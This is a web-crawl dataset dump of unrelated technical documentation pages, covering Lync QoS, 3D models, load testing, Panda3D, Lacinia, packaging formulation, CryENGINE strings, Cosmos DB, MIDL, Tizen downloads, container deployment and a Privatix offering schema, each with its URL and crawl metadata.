Real Geeks integrates with Realvolve. Every lead added to Real Geeks will be automatically sent over to Realvolve. New leads and updates to existing leads are sent, and note activities will create notes in Realvolve. Changes made in Realvolve do not propagate to Real Geeks; this integration is one way, from Real Geeks to Realvolve. The table below shows which lead fields from Real Geeks are sent to create a contact in Realvolve. Realvolve is configured as a custom Destination for your site. You can configure it in the Lead Router: you can choose to select a User – an Agent or Lender. If you do so, only leads assigned to that user are sent to Realvolve. Note that you can connect to Realvolve multiple times, each with a different user. Only leads created after you connected will be sent to Realvolve. If you want to import all your existing leads into Realvolve, see Import existing leads below. In Realvolve, click Settings on the top right corner of your dashboard, then click on Integrations. Your Utility API Key will be at the bottom of the page. Only leads created after you connected to Realvolve will be sent in real time. If you want to import all your existing leads, first you need to export from Real Geeks and then import into Realvolve. Follow our steps to export a CSV file from your Lead Manager, then follow Realvolve's instructions on how to import contacts from a CSV file:
https://docs.realgeeks.com/realvolve
2020-02-17T01:29:39
CC-MAIN-2020-10
1581875141460.64
[]
docs.realgeeks.com
reveal_quick_checkout The reveal_quick_checkout shortcode is used when you want to let customers purchase a product on a page, but don't want the checkout page to be shown initially. This shortcode will display a button that reveals the checkout page after being clicked. - checkout_action: Defaults to 'lightbox'. You can use 'reveal' to have the checkout form be revealed on-page after clicking. - clear_cart: Whether the customer's cart should be cleared before adding this product to the cart. Default is true. - checkout_text: Text to display on the checkout. Default is "Buy Now". Common examples of shortcode usage: Display a button for a single product with product ID 123. [reveal_quick_checkout id="123"] Display a button for a single product with product ID 123 and variation ID 1. [reveal_quick_checkout id="123" variation_id="1"] Display a button for purchasing two of a product with product ID 123. [reveal_quick_checkout id="123" quantity="2"] Display a button for purchasing a product with product ID 123 and text on the button that says "Purchase Now!". [reveal_quick_checkout id="123" checkout_text="Purchase Now!"] Display a button for purchasing a product with product ID 123 that is revealed on-page (not in a lightbox). [reveal_quick_checkout id="123" checkout_action="reveal"]
https://docs.amplifyplugins.com/article/224-revealquickcheckout
2020-02-17T00:25:01
CC-MAIN-2020-10
1581875141460.64
[]
docs.amplifyplugins.com
All about Missing dSYMs *********************** .. raw:: html Fabric includes a tool to automatically upload your project's dSYM. The tool is executed through the :code:`/run` script, which is added to your Run Script Build Phase during the onboarding process. There can be certain situations however, when dSYM uploads fail because of unique project configurations or :ref:`if you're using Bitcode
https://docs.fabric.io/apple/_sources/crashlytics/missing-dsyms.txt
2020-02-17T01:16:44
CC-MAIN-2020-10
1581875141460.64
[]
docs.fabric.io
Eject or Unplug a Device Applies To: Windows Server 2008 This topic provides a procedure that you can use to safely eject or unplug a removable device. Warning Unplugging or ejecting a device that supports safe removal without first using the Safe Removal application to warn the system can cause data to be lost or your system to become unstable. For example, if a device is unplugged during a data transfer, data loss is likely. If you use Safe Removal, however, you can warn the system before you unplug or eject a device, preventing possible loss of data. Any user account can be used to complete this procedure. To eject or unplug a device. Note For removable storage devices that can safely be removed while the computer is on, the computer disables write caching by default. It does this so that the devices can be removed without loss of data. Additional references Uninstalling and Reinstalling Devices Understanding the Process of Uninstalling Devices Undock a Portable Computer
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc770831%28v%3Dws.10%29
2020-02-17T02:20:39
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
meta-agl-devel layer The meta-agl-devel layer is intended to contain components that are under testing/development or software packages that OEMs need but that do not exist in AGL. Below you can find more information about the components of this layer. Virtualization support (meta-egvirt) meta-egvirt is the Virtualization Expert Group (EG-VIRT) layer, targeting to enable virtualization support in AGL. For more information, see the README.md file included in the layer, or alternatively visit the EG_VIRT wiki page at: OEM needs libraries for AGL There are some software packages that the OEM needs but that do not exist in the AGL source. This layer adds these OEM-needed libraries to AGL. The software packages list: Quick start guide To add these libraries, add the feature 'agl-oem-extra-libs': - Before building, you need to prepare the AGL layers: - You can read about this in meta-agl/README-AGL.md - Build the agl-demo-platform with 'agl-oem-extra-libs': source meta-agl/scripts/aglsetup.sh -m qemux86-64 agl-demo [agl-appfw-smack] [agl-devel] [agl-netboot] agl-oem-extra-libs - Build agl-demo-platform: bitbake agl-demo-platform Supported Machines Reference hardware: - QEMU (x86-64) - emulated machine: qemux86-64 - Renesas R-Car Gen2 (R-Car M2) - machine: porter HMI Framework Quick start guide To add the HMI Framework, it is necessary to add 'hmi-framework' to the source command, in the same way as agl-oem-extra-libs: - Before building, you need to prepare the AGL layers: - You can read about this in meta-agl/README-AGL.md - Build the agl-demo-platform with 'hmi-framework': source meta-agl/scripts/aglsetup.sh -m m3ulcb agl-demo [agl-appfw-smack] [agl-devel] [agl-netboot] hmi-framework
http://docs.automotivelinux.org/docs/devguides/en/dev/reference/meta-agl-devel.html
2017-10-17T03:45:23
CC-MAIN-2017-43
1508187820700.4
[]
docs.automotivelinux.org
Create your first AGL application Setup Let’s use for example helloworld-native-application, so you need first to clone this project into a directory that will be accessible by xds-server. Depending of the project sharing method: - Cloud sync: you can clone project anywhere on your local disk, - Path mapping: you must clone project into $HOME/xds-workspacedirectory.. Clone project cd $HOME/xds-workspace git clone --recursive Declare project into XDS Use XDS Dashboard to declare your project. Open a browser and connect to XDS Dashboard. URL depends of your config, for example Click cog icon to open configuration panel and then create/declare a new project by with the plus icon of Projects bar. Set Sharing Type and paths according to your setup. Note: when you select Path mapping, you must clone your project into $HOME/xds-workspacedirectory (named “Local Path” in modal window) and “Server Path” must be set to /home/devel/xds-workspace/xxxwhere xxx is your project directory name. If you select Cloud Sync, you can clone your project where you want on your local disk. Build from XDS dashboard Open the build page (icon ), then select your Project and the Cross SDK you want to use and click on Clean / Pre-Build / Build / Populate buttons to execute various build actions. Build from command line You need to determine which is the unique id of your project. You can find this ID in project page of XDS dashboard or you can get it from command line using the --list option. This option lists all existing projects ID: xds-exec --list List of existing projects: CKI7R47-UWNDQC3_myProject CKI7R47-UWNDQC3_test2 CKI7R47-UWNDQC3_test3 Now to refer your project, just use –id option or use XDS_PROJECT_ID environment variable. You are now ready to use XDS to for example cross build your project. Here is an example to build a project based on CMakefile: # Add xds-exec in the PATH export PATH=${PATH}:/opt/AGL/bin # Go into your project directory cd $MY_PROJECT_DIR # Create a build directory xds-exec --id=CKI7R47-UWNDQC3_myProject --sdkid=poky-agl_aarch64_4.0.1 --url= -- mkdir build # Generate build system using cmake xds-exec --id=CKI7R47-UWNDQC3_myProject --sdkid=poky-agl_aarch64_4.0.1 --url= -- cd build && cmake .. # Build the project xds-exec --id=CKI7R47-UWNDQC3_myProject --sdkid=poky-agl_aarch64_4.0.1 --url= -- cd build && make all To avoid to set project id, xds server url, … at each command line, you can define these settings as environment variable within an env file and just set --config option or source file before executing xds-exec. For example, the equivalence of above command is: # MY_PROJECT_DIR=/home/seb/xds-workspace/helloworld-native-application cd $MY_PROJECT_DIR cat > xds-project.conf << EOF export XDS_SERVER_URL=localhost:8000 export XDS_PROJECT_ID=CKI7R47-UWNDQC3_myProject export XDS_SDK_ID=poky-agl_corei7-64_4.0.1 EOF xds-exec --config xds-project.conf -- mkdir build # Or sourcing env file source xds-project.conf xds-exec -- mkdir -o build && cd build && cmake .. xds-exec -- cd build && make all Note: all parameters after a double dash (–) are considered as the command to execute on xds-server. Build from IDE First create the XDS config file that will be used later by xds-exec commands. For example we use here aarch64 SDK to cross build application for a Renesas Gen3 board. 
# create file at root directory of your project # for example: # MY_PROJECT_DIR=/home/seb/xds-workspace/helloworld-native-application cat > $MY_PROJECT_DIR/xds-gen3.conf << EOF export XDS_SERVER_URL=localhost:8000 export XDS_PROJECT_ID=cde3b382-9d3b-11e7_helloworld-native-application export XDS_SDK_ID=poky-agl_aarch64_4.0.1 EOF NetBeans Netbeans 8.x : - Open menu Tools -> Options Open C/C++ tab, in Build Tools sub-tab, click on Add button: Then, you should set Make Command and Debugger Command to point to xds tools: Finally click on OK button. Open menu File -> New Project Select C/C++ Project with Existing Sources ; Click on Next button Specify the directory where you cloned your project and click on Finish button to keep all default settings: Edit project properties (using menu File -> Project Properties) to add a new configuration that will use XDS to cross-compile your application for example for a Renesas Gen3 board) in Build category, click on Manage Configurations button and then New button to add a new configuration named for example “Gen3 board” Click on Set Active button - Select Pre-Build sub-category, and set: - Working Directory: build_gen3 - Command Line: xds-exec -c ../xds-gen3.conf -- cmake -DRSYNC_TARGET=root@renesas-gen3 -DRSYNC_PREFIX=/opt .. - Pre-build First: ticked - Select Make sub-category, and set: - Working Directory: build_gen3 - Build Command: xds-exec -c ../xds-gen3.conf -- make remote-target-populate - Clean Command: xds-exec -c ../xds-gen3.conf -- make clean - Select Run sub-category, and set: - Run Command: target/[email protected] - Run Directory: build-gen3 - Click on OK button to save settings By changing configuration from Default to Gen3 board, you can now simply compile your helloworld application natively (Default configuration) or cross-compile your application through XDS for a Renesas Gen3 board (Gen3 board configuration). Visual Studio Code Open your project in VS Code cd $MY_PROJECT_DIR code . & Add new tasks : press Ctrl+Shift+P and select the Tasks: Configure Task Runner command and you will see a list of task runner templates. And define your own tasks, here is an example to build unicens2-binding AGL binding based on cmake (options value of args array must be updated regarding your settings): { "version": "0.1.0", "linux": { "command": "/opt/AGL/bin/xds-exec" }, "isShellCommand": true, "args": [ "-url", "localhost:8000", "-id", "CKI7R47-UWNDQC3_myProject", "-sdkid", "poky-agl_aarch64_4.0.1", "--" ], "showOutput": "always", "tasks": [{ "taskName": "clean", "suppressTaskName": true, "args": [ "rm -rf build/* && echo Cleanup done." ] }, { "taskName": "pre-build", "isBuildCommand": true, "suppressTaskName": true, "args": [ "mkdir -p build && cd build && cmake -DRSYNC_TARGET=root@renesas-gen3 -DRSYNC_PREFIX=/opt" ] }, { "taskName": "build", "isBuildCommand": true, "suppressTaskName": true, "args": [ "cd build && make widget" ], "problemMatcher": { "owner": "cpp", "fileLocation": ["absolute"], "pattern": { "regexp": "^(.*):(\\d+):(\\d+):\\s+(warning|error):\\s+(.*)$", "file": 1, "line": 2, "column": 3, "severity": 4, "message": 5 } } }, { "taskName": "populate", "suppressTaskName": true, "args" : [ "cd build && make widget-target-install" ] } ] } Note: You can also add your own keybindings to trig above tasks," }, More details about VSC keybindings here More details about VSC tasks here Qt Creator Please refer to agl-hello-qml project. Thanks to Dennis for providing this useful example. Others IDE
http://docs.automotivelinux.org/docs/devguides/en/dev/reference/xds/part-1/4_build-first-app.html
2017-10-17T03:56:07
CC-MAIN-2017-43
1508187820700.4
[array(['./pictures/xds-dashboard-prj-1.png', None], dtype=object) array(['./pictures/xds-dashboard-prj-2.png', None], dtype=object)]
docs.automotivelinux.org
Building the AGL Demo Platform for Raspberry Pi Raspberry Pi 3 To build the AGL demo platform for Raspberry Pi 3, use the machine raspberrypi3 and the feature agl-demo: source meta-agl/scripts/aglsetup.sh -m raspberrypi3 agl-demo agl-netboot agl-appfw-smack bitbake agl-demo-platform Raspberry Pi 2 To build the AGL demo platform for Raspberry Pi 2, use the machine raspberrypi2 and the feature agl-demo: source meta-agl/scripts/aglsetup.sh -m raspberrypi2 agl-demo agl-netboot agl-appfw-smack bitbake agl-demo-platform Booting AGL Demo Platform on Raspberry Pi Follow the steps below to copy the image to a microSD card and to boot it on a Raspberry Pi 2 or 3: - Insert your SD card into your Linux machine. - Copy the output image from the build machine to the Linux machine that is connected to your SD card (often these are the same machine). - Output image location on the build machine for Raspberry Pi 2: tmp/deploy/images/raspberrypi2/agl-demo-platform-raspberrypi2.rpi-sdimg - Output image location on the build machine for Raspberry Pi 3: tmp/deploy/images/raspberrypi3/agl-demo-platform-raspberrypi3.rpi-sdimg - Unmount the microSD card and then flash the output image to the card as the root user: Note: the sdimage files can also be named rpi-sdimg-ota in case you have the "agl-sota" feature enabled sudo umount [sdcard device] sudo dd if=[output image] of=[sdcard device] bs=4M sync - Plug your microSD card into the Raspberry Pi 2 or 3 and boot the board
http://docs.automotivelinux.org/docs/getting_started/en/dev/reference/machines/raspberrypi.html
2017-10-17T03:49:55
CC-MAIN-2017-43
1508187820700.4
[]
docs.automotivelinux.org
If you want to search for every string that starts with "x", "ht" or "u" and ends with "ml", you can write a regular expression like this: (x|ht|u)ml. Insert this expression in the search editor and enable regular expressions by toggling the button. Please note that using regular expressions lets you make very complicated searches, but the cost could be performance degradation. Regular expressions can be very tricky, and it is often the case that "if you want to solve a problem with a regular expression, you have two problems".
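The same kind of pattern can be tried out in Python's re module, anchored here to whole words for clarity:

import re

pattern = re.compile(r"^(x|ht|u)ml$")
for word in ["xml", "html", "uml", "yaml", "xhtml"]:
    print(word, bool(pattern.match(word)))
# xml, html and uml match; yaml and xhtml do not.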
https://docs.kde.org/stable4/en/kdewebdev/kfilereplace/kfilereplace-QT-regexp.html
2017-10-17T03:48:25
CC-MAIN-2017-43
1508187820700.4
[array(['/stable4/common/top-kde.jpg', None], dtype=object)]
docs.kde.org
nbdime – diffing and merging of Jupyter Notebooks Version: 0.4.0.dev nbdime provides tools for diffing and merging Jupyter notebooks. Figure: nbdime example Why is nbdime needed? Jupyter notebooks are useful, rich media documents stored in a plain text JSON format. This format is relatively easy to parse. However, primitive line-based diff and merge tools do not handle the logical structure of notebook documents well. These tools yield diffs like this: Figure: diff using traditional line-based diff tool nbdime, on the other hand, provides "content-aware" diffing and merging of Jupyter notebooks. It understands the structure of notebook documents. Therefore, it can make intelligent decisions when diffing and merging notebooks, such as: - eliding base64-encoded images for terminal output - using existing diff tools for inputs and outputs - rendering image diffs in a web view - auto-resolving conflicts on generated values such as execution counters nbdime yields diffs like this: Figure: nbdime's content-aware diff Quickstart To get started with nbdime, install with pip: pip install nbdime And you can be off to the races by diffing notebooks in your terminal with nbdiff: nbdiff notebook_1.ipynb notebook_2.ipynb or viewing a rich web-based rendering of the diff with nbdiff-web: nbdiff-web notebook_1.ipynb notebook_2.ipynb For more information about nbdime's commands, see Console commands. Git integration quickstart Many of us who are writing and sharing notebooks do so with git and GitHub. Git doesn't handle diffing and merging notebooks very well by default, but you can configure git to use nbdime and it will get a lot better. The quickest way to get set up for git integration is to call: nbdime config-git --enable --global New in version 0.3: nbdime config-git. Prior to 0.3, each nbdime entrypoint had to enable git integration separately. This will enable both the drivers and the tools for both diff and merge. Now when you do git diff or git merge with notebooks, you should see a nice diff view, like this: Figure: nbdime's 'content-aware' command-line diff To use the web-based GUI viewers of notebook diffs, call: nbdiff-web [ref [ref]] New in version 0.3: support for passing git refs to nbdime commands Figure: nbdime's content-aware diff If you have a merge conflict in a notebook, the merge driver will ensure that the conflicted notebook is a valid notebook that can be viewed in the normal notebook viewer. In it, the conflicts will be marked similarly to how git would normally indicate conflicts, and they can be resolved manually. Alternatively, nbdime provides a web-based mergetool for visualizing and resolving merge conflicts, and it can be launched by calling: nbdime mergetool Figure: nbdime's merge with web-based GUI viewer For more detailed information on integrating nbdime with version control, see Version control integration. Contents Installation and usage Development Acknowledgements nbdime is developed with financial support from: - the OpenDreamKit Horizon 2020 European Research Infrastructures project (#676541); - the Gordon and Betty Moore Foundation through Grant GBMF #4856, by the Alfred P. Sloan Foundation and by the Helmsley Trust.
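Besides the command-line tools shown in the Quickstart, nbdime can also be driven from Python. A minimal sketch, assuming the installed version exposes nbdime.diff_notebooks and that notebooks are read with nbformat:

import nbformat
import nbdime

nb1 = nbformat.read("notebook_1.ipynb", as_version=4)
nb2 = nbformat.read("notebook_2.ipynb", as_version=4)

# diff_notebooks returns a list of diff entries describing the changes.
diff = nbdime.diff_notebooks(nb1, nb2)
print(len(diff), "top-level change(s)")
for entry in diff:
    print(entry.get("op"), entry.get("key"))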
http://nbdime.readthedocs.io/en/latest/
2017-10-17T03:44:17
CC-MAIN-2017-43
1508187820700.4
[array(['_images/nbdiff-web.png', 'example of nbdime nbdiff-web'], dtype=object) array(['_images/diff-bad-shortened.png', 'diff example using traditional line-based diff tool'], dtype=object) array(['_images/nbdiff-web.png', "example of nbdime's content-aware diff"], dtype=object) array(['_images/nbdiff-terminal.png', "nbdime's command-line diff"], dtype=object) array(['_images/nbdiff-web.png', "example of nbdime's content-aware diff"], dtype=object) array(['_images/nbmerge-web.png', "nbdime's merge with web-based GUI viewer"], dtype=object)]
nbdime.readthedocs.io
Get SQL Server Data Tools To install SQL Server Data Tools (SSDT), see Download SQL Server Data Tools (SSDT). Create a package in SQL Server Data Tools using the Package Template. Note: You can save an empty package. Choose the target version of a project and its packages: In Solution Explorer, right-click on an Integration Services project and select Properties to open the property pages for the project. On the General tab of Configuration Properties, select the TargetServerVersion property, and then choose SQL Server 2016, SQL Server 2014, or SQL Server 2012. You can create, maintain, and run packages that target SQL Server 2016, SQL Server 2014, or SQL Server 2012.
https://docs.microsoft.com/en-us/sql/integration-services/create-packages-in-sql-server-data-tools
2017-10-17T04:54:51
CC-MAIN-2017-43
1508187820700.4
[]
docs.microsoft.com
This describes how to use the New Relic REST API (v2) to get your Mobile application's overall and version-specific crash count and crash rate, which appear on the Mobile Overview page in the upper right corner. These examples use the default time period of the last 30 minutes. To obtain crash data for a different time range, add the time period to the commands. You can also use the New Relic API Explorer to retrieve Mobile metric data. Contents Prerequisites To use the API in these examples, you need: - Your New Relic REST API key - Your New Relic Mobile application ID or your Mobile application version ID. To find the Mobile application ID, see Finding the product ID: Mobile. To find the Mobile application version ID, see Find the Mobile app version ID below. Mobile app: Get crash data To obtain crash count and crash rate data for the overall Mobile application, use the Mobile application ID in the following REST API command: curl -X GET "{MOBILE_ID}.json" \ -H "X-Api-Key:${API_KEY}" -i The crash_summary output data contains both the crash_count and crash_rate. "crash_summary": { "supports_crash_data": true, "unresolved_crash_count": 14, "crash_rate": 28.155339805825243 } To obtain crash summary data for all the mobile applications in the account, use this REST API command: curl -X GET "" \ -H "X-Api-Key:${API_KEY}" -i Mobile app version: Get crash count data To obtain the crash count metric data for a specific version of the Mobile application, include the Mobile application version ID in the following REST API command: curl -X GET "{MOBILE_APP_VERSION}/metrics/data.json" \ -H "X-Api-Key:${API_KEY}" -i \ -d 'name=Mobile/Crash/All&values[]=call_count&summarize=true' Mobile app version: Get crash rate data To calculate a specific version's crash rate, use the following equation: Crash Rate = (Mobile/Crash/All:call_count) / (Session/Start:call_count) To get the two metric values needed in the equation, use the following REST API command with the Mobile application version ID . curl -X GET "{MOBILE_APP_VERSION}/metrics/data.json" \ -H "X-Api-Key:${API_KEY}" -i \ -d 'names[]=Mobile/Crash/All&names[]=Session/Start&values[]=call_count&summarize=true' Find the Mobile app version ID You must provide the version ID only when you want to obtain crash data for a specific version. You can find the Mobile application version ID from the Mobile Overview page: - Go to rpm.newrelic.com/mobile > (select an app) > Versions. Locate the Mobile application version ID in the URL that your browser shows when viewing the application version:{ACCOUNT_ID}/mobile/${MOBILE_APP_VERSION} For more help Additional documentation resources include: - Getting started with the New Relic REST API (v2) (overview of the New Relic REST API, including the structure of an API call) - Using the API Explorer (using the API Explorer's user interface to get data in and data out of New Relic
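For reference, the two metric calls used in the crash-rate equation can also be scripted. The sketch below uses Python and the requests library; the host name, API key, version ID, and the exact shape of the JSON response (metric_data -> metrics -> timeslices -> values) are assumptions based on the v2 metric data endpoints described above, so verify them against your own account before relying on the parsing.

```python
import requests

API_KEY = "YOUR_REST_API_KEY"       # placeholder
APP_VERSION_ID = "123456789"        # placeholder Mobile app version ID

# Assumed v2 endpoint layout; confirm against the curl commands shown above.
url = (
    "https://api.newrelic.com/v2/mobile_applications/"
    f"{APP_VERSION_ID}/metrics/data.json"
)
params = {
    "names[]": ["Mobile/Crash/All", "Session/Start"],
    "values[]": "call_count",
    "summarize": "true",
}
resp = requests.get(url, headers={"X-Api-Key": API_KEY}, params=params)
resp.raise_for_status()

# Pull the summarized call_count for each metric out of the response.
counts = {}
for metric in resp.json()["metric_data"]["metrics"]:
    counts[metric["name"]] = metric["timeslices"][0]["values"]["call_count"]

# Crash Rate = (Mobile/Crash/All:call_count) / (Session/Start:call_count)
crash_rate = counts["Mobile/Crash/All"] / counts["Session/Start"]
print(f"Crash rate: {crash_rate:.2%}")
```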
https://docs.newrelic.com/docs/apis/rest-api-v2/mobile-examples-v2/mobile-crash-count-crash-rate-example-v2
2020-07-02T16:50:29
CC-MAIN-2020-29
1593655879532.0
[]
docs.newrelic.com
MessageType Overview This enum contains the possible message types that client and server can send to each other. Messages of different types have different meaning in the same messaging protocol. The concrete messaging protocol can limit the number of message types supported. Dealing with message type is encapsulated in the library or generated code and never exposed to users. Location - Reference: RemObjects.SDK.dll - Namespace: RemObjects.SDK
https://docs.remotingsdk.com/API/NET/Enums/MessageType/
2020-07-02T15:28:01
CC-MAIN-2020-29
1593655879532.0
[]
docs.remotingsdk.com
3. Guides¶ This section contains several guides explaining how to do certain things by using the plugin. These are just a collection of the instructions already available in the documentation. Not everything that can be done in the plugin is listed here. Although the names of the settings of WP Content Crawler are generally self-explanatory, you can refer to the documentations of the settings if you cannot find the guide you are looking for here. Interactive guides The plugin has interactive guides as well. You can reach the interactive guides by clicking to Guides button shown at the bottom right corner of the pages of the plugin. To start the guide or one of its steps, just click its play button. Note that not every guide listed here is available as an interactive guide. So, if you cannot find the guide you are looking for as an interactive guide, you can check this page to see if it is available here. Contents - 3.1. Creating site settings to crawl a site - 3.2. Saving posts automatically - 3.3. Updating posts automatically - 3.4. Translating posts automatically - 3.5. Spinning posts automatically - 3.6. Deleting posts automatically - 3.7. Using cookies - 3.8. Increasing speed of tests in site settings page - 3.9. Using custom general settings for a site - 3.10. Adding category URLs automatically - 3.11. Duplicating site settings - 3.12. Manually saving posts - 3.13. Manually updating posts - 3.14. Tracking saved posts - 3.15. Getting notified when selectors cannot find a value - 3.16. Testing site settings - 3.17. Collecting post URLs from multiple pages of a category - 3.18. Saving multi-page posts - 3.19. Saving list-type posts - 3.20. Saving post meta (custom fields) - 3.21. Saving taxonomy values - 3.22. Creating post categories automatically - 3.23. Saving posts as custom post types - 3.24. Disabling fixed navigation and tabs in site settings page - 3.25. Saving post title - 3.26. Saving post excerpt - 3.27. Saving post content - 3.28. Saving post tags - 3.29. Saving post permalink (slug) - 3.30. Saving post date - 3.31. Saving the featured image of a post - 3.32. Saving images in post content - 3.33. Saving lazy-loaded images - 3.34. Defining custom short codes to use anything in templates - 3.35. Saving WooCommerce products - 3.36. Saving featured images from category pages - 3.37. Defining how posts are marked as duplicate - 3.38. Adding/removing things to/from post content - 3.39. Adding/removing things to/from post title - 3.40. Adding/removing things to/from post excerpt - 3.41. Saving posts as draft or pending (defining post status) - 3.42. Setting the author of the posts - 3.43. Removing the links in post content - 3.44. Showing iframes in post content - 3.45. Showing scripts in post content - 3.46. Creating a gallery of images or files in post content - 3.47. Taking notes about site settings - 3.48. Changing something in every page of every site - 3.49. Removing an HTML element from post content - 3.50. Dealing with character encoding problems - 3.51. Using proxies - 3.52. Adding/removing/changing things in target page - 3.53. Limiting maximum tags posts can have - 3.54. Setting password to posts - 3.55. Setting HTTP User Agent and HTTP Accept values - 3.56. Manually adding post URLs - 3.57. Deleting post URLs of a site
https://docs.wpcontentcrawler.com/guides/index.html
2020-07-02T15:01:21
CC-MAIN-2020-29
1593655879532.0
[]
docs.wpcontentcrawler.com
Overview This feature can be useful for instant raytracing of fast-moving objects. Normally, a physics proxy will be one frame ahead of the render geometry due to multithreading, which means aiming at the render proxy can miss. Also, pe_status_pos will be guaranteed to return the same coordinates that were set by a preceding pe_params_pos, even if the command was queued and hasn't been fully executed yet. ... To use these coordinates in RWI, PWI, and GEA, ent_use_sync_coords must be set in objtypes. To use them in pe_status_pos, status_use_sync_coords must be set in flags. By default, sync coords are not enabled and not used.
https://docs.cryengine.com/pages/diffpages.action?originalId=44967751&pageId=44964142
2020-07-02T14:44:21
CC-MAIN-2020-29
1593655879532.0
[]
docs.cryengine.com
sstabledowngrade Downgrades the SSTables in the given table or snapshot to the version of Cassandra compatible with the current version of DSE. cassandra.yaml: The location of the cassandra.yaml file depends on the type of installation. Downgrades the SSTables in the given table or snapshot to the version of OSS Apache Cassandra™ that is compatible with the current version of DSE. Important: The sstabledowngrade command cannot be used to downgrade system tables or downgrade DSE versions. Synopsis: sstabledowngrade ... - --sstable-files - Instead of processing all SSTables in the default data directories, process only the tables specified via this option. If a single SSTable file is specified, only that SSTable is processed. If a directory is specified, all SSTables within that directory are processed. Snapshots and backups are not supported with this option. - Downgrade the events table in the cycling keyspace: sstabledowngrade cycling events Found 1 sstables to rewrite. Rewriting TrieIndexSSTableReader(path='/var/lib/cassandra/data/cycling/events-2118bc7054af11e987feb76774f7ab56/aa-1-bti-Data.db') to BIG/mc. Rewrite of TrieIndexSSTableReader(path='/var/lib/cassandra/data/cycling/events-2118bc7054af11e987feb76774f7ab56/aa-1-bti-Data.db') to BIG/mc complete.
https://docs.datastax.com/en/dse/6.0/dse-dev/datastax_enterprise/tools/toolsSStables/ToolsSSTabledowngrade.html
2020-07-02T15:29:55
CC-MAIN-2020-29
1593655879532.0
[]
docs.datastax.com
Defaults represent the concept of "globals" in the system. Administrative users can define several different types of defaults, which can be overwritten at the Domain and User level. To access defaults, go to the provisioning section of the product. Click the "Manage By" pulldown, and then select "Defaults". This view will show several categories. Default values are required: when restoring an edgeSuite v2.1 archive inside of edgeCore v3.0, all Secured Variables and Credentials MUST have test or default values configured.
https://docs.edge-technologies.com/docs/edgecore-defaults/
2020-07-02T14:50:05
CC-MAIN-2020-29
1593655879532.0
[]
docs.edge-technologies.com
1 Introduction The data view is a central component of Mendix applications. It is the starting point for showing the contents of exactly one object. For example, if you want to show the details of a single customer, you can use a data view to do this. The data view typically contains input widgets like text boxes with labels. In more complex screens, a data view can contain tab controls per topic (for example, address and payment information) and data views and data grids for related objects (for example, order history or wish list). A more advanced data view with a tab control and a data grid inside. 2 Components 2.1 Data View Contents Area The data view contents area is where all the layout and input widgets go. Often the contents area contains a table with two columns: the first column showing labels and the second column containing input widgets. Other layouts are possible, as you can see in the examples above. 2.2 Data View Footer The footer of the data view is the section at the bottom of the data view that often contains buttons to confirm or cancel the page. However, arbitrary widgets are allowed. The footer will stick to the bottom if the data view is the only top-level widget. 4 General Properties value: Horizontal value: 3 4.3 Show Footer With this property, you can specify whether you want the footer of the data view to be visible. The footer of nested data views is always invisible, regardless of the value of this property. Default value: True. value: empty 5 Editability Properties 5.1 Editable The editable property indicates whether the data view as a whole is editable or not. If the data view is not editable, no widget inside the data view will be editable. On the other hand, if the data view is editable, each widget is determined to be editable based on its own editable property. Default value: True 5.2 Read-Only Style This property determines how input widgets are rendered if read-only. Default value: Control 6 Data Source Properties The data source determines which object will be shown in the data view. For general information about data sources, see Data Sources. 6.1 Type The data view supports the following types of data source: context, microflow, and listen to widget. Whatever data source you select, the data view will always return one single object. 6.2 Entity, Microflow, Listen To Widget See the corresponding data source for specific properties: - Context source - either a page parameter or a surrounding data element - Microflow source - a microflow returning only one object - Listen to widget source - any widget returning only one object 6.3 Use Schema This property has been deprecated in version 7.2.0 and is marked for removal in version 8.0.0. Curently this has no effect. 7.
https://docs.mendix.com/refguide7/data-view
2020-07-02T15:54:43
CC-MAIN-2020-29
1593655879532.0
[array(['attachments/pages/data-view.png', None], dtype=object) array(['/refguide7/attachments/pages/show-styles.png', 'Location and effect of the Show styles button'], dtype=object)]
docs.mendix.com
It is publicly inherited from class Files. It defines an awesome feature that is ideal when doing a parameter study. Below are the routines that manipulate a counter file, called COUNTER_DONOTDEL, to store run numbers. More... #include <FilesAndRunNumber.h> It is publicly inherited from class Files. It defines an awesome feature that is ideal when doing a parameter study. Below are the routines that manipulate a counter file, called COUNTER_DONOTDEL, to store run numbers. For a paramater study, a particular DPM simulation is run several times. Each time the code is executed, the run number or counter, in the COUNTER_DONOTDEL, gets incremented. Based on the counter your file name is named as problemName.1.data, problemName.2.data... If the File::fileType_ is chosen as Multiple files, then the your data files will have the name as problemName.runNumber.0, problemName.runNumber.1 ... Definition at line 52 of file FilesAndRunNumber.h. Constructor. Definition at line 38 of file FilesAndRunNumber.cc. References constructor(). Copy constructor. Definition at line 49 of file FilesAndRunNumber.cc. References runNumber_. Constructor. Definition at line 61 of file FilesAndRunNumber.cc. The autoNumber() function is the trigger. It calls three functions. setRunNumber(), readRunNumberFromFile() and incrementRunNumberInFile(). Definition at line 79 of file FilesAndRunNumber.cc. References incrementRunNumberInFile(), readRunNumberFromFile(), and setRunNumber(). Referenced by DPMBase::readNextArgument(). a function called by the FilesAndRunNumber() (constructor) Initialises the runNumber_ = 0 Definition at line 71 of file FilesAndRunNumber.cc. References runNumber_. Referenced by FilesAndRunNumber(). This turns a counter into two indices which is an amazing feature for doing two dimensional parameter studies. The indices run from 1:size_x and 1:size_y, while the study number starts at 0 ( initially the counter=1 in COUNTER_DONOTDEL) Lets say size_x = 2 and size_y = 5, counter stored in COUNTER_DONOTDEL =1. The study_size = 10. Substituting these values into the below algorithm implies that study_num = 0 or 1, everytime the code is executed the counter gets incremented and hence determined the values of study_num, i and j which is returned as a std::vector<int> Definition at line 193 of file FilesAndRunNumber.cc. References getRunNumber(). This returns the current value of the counter (runNumber_) Definition at line 143 of file FilesAndRunNumber.cc. References runNumber_. Referenced by get2DParametersFromRunNumber(), and DPMBase::solve(). Increment the run Number (counter value) stored in the file_counter (COUNTER_DONOTDEL) by 1 and store the new value in the counter file. In order to increment the counter stored in COUNTER_DONOTDEL, we initialise two fstream objects counter_file, counter_file2 and an integer type temp_counter. First we open the file COUNTER_DONOTDEL, check if everything went fine with the opening. If yes, we extract the runNumber (counter) into the temp_counter. Increment the temp_counter and then write it into COUNTER_DONOTDEL. This is how we increment the counter in the file. Definition at line 154 of file FilesAndRunNumber.cc. Referenced by autoNumber(). This launches a code from within this code. Please pass the name of the code to run. Definition at line 220 of file FilesAndRunNumber.cc. Accepts an input stream std::istream. Definition at line 230 of file FilesAndRunNumber.cc. References Files::read(), and runNumber_. Referenced by DPMBase::read(). 
